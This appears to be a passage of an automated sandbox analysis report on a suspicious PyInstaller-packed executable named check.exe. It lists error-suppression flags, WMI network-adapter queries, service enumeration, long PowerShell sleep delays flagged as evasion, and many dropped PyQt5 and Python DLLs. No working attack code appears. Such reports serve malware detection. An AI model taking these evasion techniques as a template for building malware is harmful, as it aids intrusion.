Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyList_New,OpenSCManagerA,GetLastError,PyErr_SetFromWindowsErrWithFilename,EnumServicesStatusExW,GetLastError,free,malloc,EnumServicesStatusExW,PyUnicode_FromWideChar,PyUnicode_FromWideChar,Py_BuildValue,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,16_2_00007FFB9DD681E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4349Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5347Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
